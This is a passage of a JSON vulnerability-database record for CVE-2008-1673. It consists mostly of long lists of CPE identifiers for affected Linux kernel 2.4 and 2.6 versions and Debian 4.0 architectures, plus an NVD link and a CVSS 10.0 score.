"cpe:/o:linux:linux_kernel:2.6.24.1", "cpe:/o:linux:linux_kernel:2.6.23.2", "cpe:/o:linux:linux_kernel:2.6.24.2", "cpe:/o:linux:linux_kernel:2.6.12", "cpe:/o:linux:linux_kernel:2.6.21.1", "cpe:/o:linux:linux_kernel:2.6.1", "cpe:/o:linux:linux_kernel:2.6.23.9", "cpe:/o:linux:linux_kernel:2.6.21.7", "cpe:/o:linux:linux_kernel:2.4.20", "cpe:/o:linux:linux_kernel:2.4.14", "cpe:/o:linux:linux_kernel:2.6.23.14", "cpe:/o:linux:linux_kernel:2.6.22.1", "cpe:/o:linux:linux_kernel:2.6.17.11", "cpe:/o:linux:linux_kernel:2.4.36.4", "cpe:/o:linux:linux_kernel:2.6.14", "cpe:/o:linux:linux_kernel:2.6.16.27", "cpe:/o:linux:linux_kernel:2.6.22.11", "cpe:/o:linux:linux_kernel:2.6.17.2", "cpe:/o:linux:linux_kernel:2.6.11.11", "cpe:/o:linux:linux_kernel:2.6.23", "cpe:/o:linux:linux_kernel:2.6.19", "cpe:/o:linux:linux_kernel:2.6.12.5", "cpe:/o:linux:linux_kernel:2.6.21.6", "cpe:/o:linux:linux_kernel:2.6.17.1", "cpe:/o:linux:linux_kernel:2.4.26", "cpe:/o:linux:linux_kernel:2.6.20.15", "cpe:/o:linux:linux_kernel:2.4.23_ow2", "cpe:/o:linux:linux_kernel:2.6.23.10", "cpe:/o:linux:linux_kernel:2.6.13", "cpe:/o:linux:linux_kernel:2.4.25", "cpe:/o:linux:linux_kernel:2.6.14.5", "cpe:/o:linux:linux_kernel:2.6.20.11", "cpe:/o:linux:linux_kernel:2.4.8", "cpe:/o:linux:linux_kernel:2.6.22_rc7", "cpe:/o:linux:linux_kernel:2.6.23.6", "cpe:/o:linux:linux_kernel:2.6.19.2", "cpe:/o:linux:linux_kernel:2.6.17.10", "cpe:/o:linux:linux_kernel:2.6.16.19", "cpe:/o:linux:linux_kernel:2.6.15.1", "cpe:/o:linux:linux_kernel:2.6.23.7", "cpe:/o:linux:linux_kernel:2.4.36.2", "cpe:/o:linux:linux_kernel:2.4.7", "cpe:/o:linux:linux_kernel:2.6.20", "cpe:/o:linux:linux_kernel:2.6.22.7", "cpe:/o:linux:linux_kernel:2.6.25.1", "cpe:/o:linux:linux_kernel:2.6.22.4", "cpe:/o:linux:linux_kernel:2.4.34", "cpe:/o:linux:linux_kernel:2.6.18", "cpe:/o:linux:linux_kernel:2.4.2", "cpe:/o:linux:linux_kernel:2.6.20.8", "cpe:/o:linux:linux_kernel:2.6.14.2", "cpe:/o:linux:linux_kernel:2.4.22", "cpe:/o:linux:linux_kernel:2.6.16.12", "cpe:/o:linux:linux_kernel:2.6.23.5", "cpe:/o:linux:linux_kernel:2.6.17.13", "cpe:/o:linux:linux_kernel:2.4.18", "cpe:/o:linux:linux_kernel:2.4.30", "cpe:/o:linux:linux_kernel:2.6.12.1", "cpe:/o:linux:linux_kernel:2.6.24_rc1", "cpe:/o:linux:linux_kernel:2.6.20.3", "cpe:/o:linux:linux_kernel:2.4.16", "cpe:/o:linux:linux_kernel:2.6.14.3", "cpe:/o:linux:linux_kernel:2.6.24.6", "cpe:/o:linux:linux_kernel:2.4.4", "cpe:/o:linux:linux_kernel:2.6.16.1", "cpe:/o:linux:linux_kernel:2.6.17.3", "cpe:/o:linux:linux_kernel:2.4.33.5", "cpe:/o:linux:linux_kernel:2.6.22.12", "cpe:/o:linux:linux_kernel:2.6.18.3", "cpe:/o:linux:linux_kernel:2.6.0", "cpe:/o:linux:linux_kernel:2.4.33.2", "cpe:/o:linux:linux_kernel:2.6.2", "cpe:/o:linux:linux_kernel:2.6.22", "cpe:/o:linux:linux_kernel:2.6.13.2", "cpe:/o:linux:linux_kernel:2.6.22.5", "cpe:/o:linux:linux_kernel:2.4.23", "cpe:/o:linux:linux_kernel:2.4.12", "cpe:/o:linux:linux_kernel:2.6.20.2", "cpe:/o:linux:linux_kernel:2.6.10", "cpe:/o:linux:linux_kernel:2.6.17.8", "cpe:/o:linux:linux_kernel:2.6.11.12", "cpe:/o:linux:linux_kernel:2.6.11", "cpe:/o:linux:linux_kernel:2.6.15.5", "cpe:/o:linux:linux_kernel:2.6.15.3", "cpe:/o:linux:linux_kernel:2.6.22_rc1", "cpe:/o:linux:linux_kernel:2.6.17.14", "cpe:/o:linux:linux_kernel:2.6.16.7", "cpe:/o:linux:linux_kernel:2.4.35", "cpe:/o:linux:linux_kernel:2.6.23.4", "cpe:/o:linux:linux_kernel:2.4.36", "cpe:/o:linux:linux_kernel:2.6.15.4", "cpe:/o:linux:linux_kernel:2.4.13", "cpe:/o:linux:linux_kernel:2.6.20.5", "cpe:/o:linux:linux_kernel:2.6.11.6", "cpe:/o:linux:linux_kernel:2.6.17.12", "cpe:/o:linux:linux_kernel:2.4.31", "cpe:/o:linux:linux_kernel:2.4.0", "cpe:/o:linux:linux_kernel:2.6.17", "cpe:/o:linux:linux_kernel:2.4.28", "cpe:/o:linux:linux_kernel:2.6.20.4", "cpe:/o:linux:linux_kernel:2.4.6", "cpe:/o:linux:linux_kernel:2.4.10", "cpe:/o:linux:linux_kernel:2.4.36.3", "cpe:/o:linux:linux_kernel:2.6.25", "cpe:/o:linux:linux_kernel:2.6.13.4", "cpe:/o:linux:linux_kernel:2.6.11.4", "cpe:/o:linux:linux_kernel:2.6.12.4", "cpe:/o:linux:linux_kernel:2.6.16", "cpe:/o:linux:linux_kernel:2.6.22.8", "cpe:/o:linux:linux_kernel:2.6.25.4", "cpe:/o:linux:linux_kernel:2.6.15.11", "cpe:/o:linux:linux_kernel:2.6.24", "cpe:/o:linux:linux_kernel:2.4.19", "cpe:/o:linux:linux_kernel:2.6.15", "cpe:/o:linux:linux_kernel:2.6.17.7", "cpe:/o:linux:linux_kernel:2.4.33.4", "cpe:/o:linux:linux_kernel:2.6.18.4", "cpe:/o:linux:linux_kernel:2.6_test9_cvs", "cpe:/o:linux:linux_kernel:2.4.36.5", "cpe:/o:linux:linux_kernel:2.6.12.12", "cpe:/o:linux:linux_kernel:2.6.11.5", "cpe:/o:linux:linux_kernel:2.6.12.6", "cpe:/o:linux:linux_kernel:2.6.25.2", "cpe:/o:linux:linux_kernel:2.4.3", "cpe:/o:linux:linux_kernel:2.6.17.6", "cpe:/o:linux:linux_kernel:2.4.32", "cpe:/o:linux:linux_kernel:2.4.17", "cpe:/o:linux:linux_kernel:2.6.22.14", "cpe:/o:linux:linux_kernel:2.6.22.13", "cpe:/o:linux:linux_kernel:2.6.22.17", "cpe:/o:linux:linux_kernel:2.6.20.1", "cpe:/o:linux:linux_kernel:2.4.1", "cpe:/o:linux:linux_kernel:2.6.13.1", "cpe:/o:linux:linux_kernel:2.4.15", "cpe:/o:linux:linux_kernel:2.6.12.2", "cpe:/o:linux:linux_kernel:2.6.20.13", "cpe:/o:linux:linux_kernel:2.6.16.11", "cpe:/o:linux:linux_kernel:2.6.17.5", "cpe:/o:linux:linux_kernel:2.6.16.23", "cpe:/o:linux:linux_kernel:2.4.33", "cpe:/o:linux:linux_kernel:2.6.23.3", "cpe:/o:linux:linux_kernel:2.6.13.3", "cpe:/o:linux:linux_kernel:2.6.21.2", "cpe:/o:linux:linux_kernel:2.6.16.13", "cpe:/o:linux:linux_kernel:2.4.29", "cpe:/o:linux:linux_kernel:2.4.24", "cpe:/o:linux:linux_kernel:2.6.22.6", "cpe:/o:linux:linux_kernel:2.4.36.1"], "id": "CVE-2008-1673", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-1673", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:2.6.23.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.0:test2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.0:test9:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.34:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.0:test12:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.0:test2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.20.1:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:4.0:*:amd64:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.22.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.12.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.15.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.36.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.15.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.19:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.15.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.22.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.21.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.14.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.0:test11:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.17:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.20.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.23:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.20.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.24_ow1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.27:pre3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.12:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.25:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.17.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.19:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.27:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.20.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.14:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.21.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.27:pre4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.22.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.23.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.0:test8:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.31:pre1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.36.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.21:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.22:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.24.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11.12:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:4.0:*:sparc:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.23_ow2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.19:pre2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.17.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.13.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.0:test9:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.16.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.20.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.14.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.20.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.15:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.16.7:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:4.0:*:ia-32:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.16.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.12.22:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:4.0:*:m68k:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.0:test7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.17:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.13.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.18:pre5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.23.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.25.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.0:test10:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.24:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.15.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.23:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.24.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.23.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.22.6:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:4.0:*:hppa:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.24_rc1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.29:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.22.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.19:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:4.0:*:powerpc:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.17:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.15.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.20.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.24:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.17.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.18:pre8:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.0:test3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.22.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.0:test7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.12:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.25.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.10:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.36.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.21:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.12.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.13:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.0:test5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.36:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.0:test6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.22.17:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.21:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.22.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.25.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.23.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.17.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.16.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.18.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.0:test3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.12.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.22.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.19:pre4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.22.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.24:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.22_rc7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.0:test4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.18:pre4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.16.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.20:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.26:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.33.2:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:4.0:*:mips:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.16.27:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6_test9_cvs:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.23.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.35:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.30:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.33:pre1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.25:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.0:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.13:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.22.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.22:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.24.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.33.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.0:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.17.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.22.16:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.14:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.23.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.17.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.16.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.18:pre1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.23.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.19:pre6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.22_rc1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.18.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.18:pre2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.22.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.32:pre2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.21.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.18:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.14.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.27:pre5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.20.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.23.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.15:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.19:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.14:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.13:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.19.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.36.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.21.1:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:4.0:*:alpha:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.17.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.29:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.1:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:4.0:*:arm:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.23:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.13:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.20:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.0:test6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.1:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.0:test8:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.19:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.16.23:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.15:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.19:pre5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.12.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.22.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.13.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.16:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.23:pre9:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.23.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.20.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.21:pre1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.18.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.0:test5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.19:pre1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.18:pre6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.19.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.21:pre4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.33:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.32:pre1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.1:rc2:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:4.0:*:mipsel:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.12.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.19:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.30:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.17.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.15.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.14.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.17.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.23:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.33.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.18:pre7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.29:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.21:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.30:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.21:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.17.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.33.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.0:test4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.12.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.21:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.36.1:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:4.0:*:s-390:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.17.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.18:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.31:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.12:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.25.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.0:test1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.0:test1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.16:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.16:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:4.0:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.28:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.20:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.32:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.21:pre7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.12.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.17.13:*:*:*:*:*:*:*", 